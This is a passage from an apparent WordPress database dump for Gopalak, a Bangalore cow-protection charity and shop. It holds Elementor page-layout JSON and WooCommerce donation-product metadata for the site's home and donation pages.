ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2c59178\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"29d5b45\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1340,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\"},{\"id\":1354,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/istockphoto-1221688781-612x612-1.jpg\"},{\"id\":1339,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/cows-farming-on-green-meadow-260nw-1704884002-e1663753177624.webp\"},{\"id\":1355,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/803471.jpg\"},{\"id\":1357,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/279356.webp\"}],\"autoplay_speed\":1000},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f9dd695\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0f89775\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"66d5270\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ba24d1d\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"background_background\":\"slideshow\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/values.png\",\"id\":1654,\"alt\":\"\",\"source\":\"library\"},\"background_slideshow_gallery\":[{\"id\":1577,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/GOPALAK55.png\"},{\"id\":1544,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/gopalak-B1-copy.jpg\"}],\"padding\":{\"unit\":\"px\",\"top\":\"150\",\"right\":\"0\",\"bottom\":\"0150\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5007eb7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"c7f7d6b\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"full\",\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"0\",\"bottom\":\"-10\",\"left\":\"-10\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7410379\",\"elType\":\"section\",\"settings\":{\"background_background\":\"classic\",\"background_color\":\"#001B06\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"b43ead7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"5282e6a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Address\",\"header_size\":\"h4\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6d3c6b7\",\"elType\":\"widget\",\"settings\":{\"title\":\" #800 Spandana towers\\n<br>19th main roadr,  HSR Layout<br>2nd sector, near golden fresh super market<br>Bangalore, 560102<br>\\nContact : (+91)7411722844<br>\\nE-mail id: namaste@gopalak.in\\n\",\"header_size\":\"span\",\"title_color\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false}]'),(10621,1765,'_elementor_page_assets','a:0:{}'),(10624,1767,'_edit_lock','1665732657:1'),(10625,1767,'_edit_last','1'),(10626,1767,'_elementor_edit_mode','builder'),(10627,1767,'_elementor_template_type','wp-page'),(10628,1767,'_elementor_version','3.7.8'),(10629,1767,'_wp_page_template','default'),(10630,1767,'_elementor_data','[{\"id\":\"b17ee21\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"4d1b477\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ae2b962\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[wcdp_donation_form]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(10631,1767,'_elementor_page_assets','a:0:{}'),(10636,1775,'_edit_lock','1665740977:1'),(10637,1775,'_edit_last','1'),(10638,1775,'_thumbnail_id','1689'),(10639,1775,'_donable','yes'),(10640,1775,'wcdp-settings[0]','0'),(10641,1775,'wcdp-settings[1]',''),(10642,1775,'wcdp-settings[wcdp_fundraising_goal]','0'),(10643,1775,'wcdp-settings[wcdp_fundraising_end_date]',''),(10644,1775,'total_sales','3'),(10645,1775,'_tax_status','taxable'),(10646,1775,'_tax_class',''),(10647,1775,'_manage_stock','no'),(10648,1775,'_backorders','no'),(10649,1775,'_sold_individually','no'),(10650,1775,'_virtual','no'),(10651,1775,'_downloadable','no'),(10652,1775,'_download_limit','-1'),(10653,1775,'_download_expiry','-1'),(10654,1775,'_stock',NULL),(10655,1775,'_stock_status','instock'),(10656,1775,'_wc_average_rating','0'),(10657,1775,'_wc_review_count','0'),(10658,1775,'_product_version','7.0.0'),(10659,1775,'_ywpo_preorder','no'),(10660,1775,'_wcfmmp_commission','a:5:{s:15:\"commission_mode\";s:6:\"global\";s:18:\"commission_percent\";s:2:\"90\";s:16:\"commission_fixed\";s:0:\"\";s:8:\"tax_name\";s:0:\"\";s:11:\"tax_percent\";s:0:\"\";}'),(10661,1775,'wcdp_total_revenue','a:2:{s:7:\"revenue\";d:0;s:4:\"time\";i:1665732856;}'),(10662,1775,'_wcfm_product_views','174'),(10692,1781,'_elementor_edit_mode','builder'),(10693,1781,'_elementor_template_type','wp-page'),(10694,1781,'_elementor_version','3.7.8'),(10695,1781,'_wp_page_template','elementor_canvas'),(10696,1781,'_elementor_data','[{\"id\":\"2bcecd0\",\"elType\":\"section\",\"settings\":{\"structure\":\"70\",\"background_background\":\"classic\",\"background_color\":\"#006505\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-47\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"08c3f0f\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"98c2def\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/logo1211.png\",\"id\":1615,\"alt\":\"\",\"source\":\"library\"},\"image_size\":\"thumbnail\",\"image_custom_dimension\":{\"width\":\"75\",\"height\":\"75\"},\"link_to\":\"custom\",\"width\":{\"unit\":\"%\",\"size\":87,\"sizes\":[]},\"height\":{\"unit\":\"px\",\"size\":99,\"sizes\":[]},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"3439158\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"f29b88a\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"049c5ad\",\"elType\":\"widget\",\"settings\":{\"text\":\"Home\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5af2fa6\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null,\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"59347f6\",\"elType\":\"widget\",\"settings\":{\"text\":\"shop\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"db735bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"27f86d0\",\"elType\":\"widget\",\"settings\":{\"text\":\"Adopt\\/Donate\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4613375\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"36373ca\",\"elType\":\"widget\",\"settings\":{\"text\":\"About us\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"b366bab\",\"elType\":\"column\",\"settings\":{\"_column_size\":14,\"_inline_size\":null},\"elements\":[{\"id\":\"4c45b22\",\"elType\":\"widget\",\"settings\":{\"text\":\"My Account\",\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/my-account\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"align\":\"justify\",\"size\":\"xs\",\"icon_indent\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"background_color\":\"#7EB081\",\"_margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"574c840\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"structure\":\"20\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/Frame.png\",\"id\":1693,\"alt\":\"\",\"source\":\"library\"},\"background_repeat\":\"no-repeat\",\"background_size\":\"initial\",\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-3\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"84647ad\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"4e75547\",\"elType\":\"widget\",\"settings\":{\"carousel\":[{\"id\":1690,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2602864-scaled.jpg\"},{\"id\":1689,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kat-smith-735976-scaled.jpg\"},{\"id\":1691,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-mark-stebnicki-2252557-scaled.jpg\"},{\"id\":1741,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-min-an-1455455-scaled.jpg\"},{\"id\":1742,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-roman-odintsov-8747798-scaled.jpg\"},{\"id\":1687,\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/pexels-kelly-2881385-scaled.jpg\"}],\"thumbnail_size\":\"full\",\"slides_to_show\":\"1\",\"navigation\":\"none\",\"autoplay_speed\":1000,\"_margin\":{\"unit\":\"px\",\"top\":\"-10\",\"right\":\"12\",\"bottom\":\"-21\",\"left\":\"-12\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"image-carousel\"}],\"isInner\":false},{\"id\":\"0468eb3\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"d5b9324\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"e372b45\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"ce9e678\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"73700aa\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":975,\"sizes\":[]},\"structure\":\"20\"},\"elements\":[{\"id\":\"f55311d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50},\"elements\":[{\"id\":\"8ea7d73\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/10\\/depositphotos_12743475-stock-photo-farm-cattle.webp\",\"id\":1567,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"Adopt\\/Donate\",\"description_text\":\"You can donate any amount of your choice which will be used for fodder to feed cows.\\n\\n\\n\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\"},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"d6c2143\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/adopt-donate\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"5bb322c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":50,\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"-20\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"9ea7478\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/gopalak.in\\/wp-content\\/uploads\\/2022\\/09\\/banner1.jpg\",\"id\":1340,\"alt\":\"\",\"source\":\"library\"},\"thumbnail_size\":\"custom\",\"title_text\":\"This is the heading\",\"description_text\":\"\\\"Cow is the source of progress and prosperity. In many ways it is superior to one\\u2019s mother\\\"\",\"image_size\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"_background_background\":\"classic\",\"_background_color\":\"#D0FECA\",\"thumbnail_custom_dimension\":{\"width\":\"600\",\"height\":\"400\"}},\"elements\":[],\"widgetType\":\"image-box\"},{\"id\":\"cc6e4e9\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#2B3E2D\",\"_margin\":{\"unit\":\"px\",\"top\":\"-19\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/shop\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7107c53\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"c67e6d7\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e70fe37\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"11aef9e\",\"elType\":\"section\",\"settings\":{\"content_width\":{\"unit\":\"px\",\"size\":904,\"sizes\":[]},\"structure\":\"22\"},\"elements\":[{\"id\":\"2d9f268\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null},\"elements\":[{\"id\":\"86a6968\",\"elType\":\"widget\",\"settings\":{\"title\":\"About Gopalak\",\"title_color\":\"#264D5D\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"aa78264\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Gopalak is committed to work with a dedicated mission of Cow Protection and Avail people to cow importance to the world. the cow is the mother of mothers since it has the ability to feed, provide and support humanity in many ways.<br \\/>Goplak is working towards to helping to goshalas and supporting to goshalas product for cows well being<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"67983f0\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8e299f1\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\",\"align\":\"justify\",\"background_color\":\"#324735\",\"_margin\":{\"unit\":\"px\",\"top\":\"49\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"link\":{\"url\":\"https:\\/\\/gopalak.in\\/about-us\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"23d3073\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"7d36be0\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"e43f473\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":71,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1c1c876\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\",\"background_background\":\"classic\",\"background_color\":\"#D8CDCD52\"},\"elements\":[{\"id\":\"4b90a4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"dee4139\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=0wll4Km5AU8\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"97c7ffb\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f586793\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=bEyCT3KsAMQ\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false},{\"id\":\"2f0ac23\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ec43a70\",\"elType\":\"widget\",\"settings\":{\"youtube_url\":\"https:\\/\\/www.youtube.com\\/watch?v=sVQg0-3WSc4\",\"vimeo_url\":\"https:\\/\\/vimeo.com\\/235215203\",\"dailymotion_url\":\"https:\\/\\/www.dailymotion.com\\/video\\/x6tqhqb\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ca8c599\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"f8ca017\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"da25a76\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"216af8d\",\"elType\":\"section\",\"settings\":{\"structure\":\"21\"},\"elements\":[{\"id\":\"882c92e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"772bd0e\",\"elType\":\"widget\",\"settings\":{\"title\":\"Gallery\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"fbf7c50\",\"e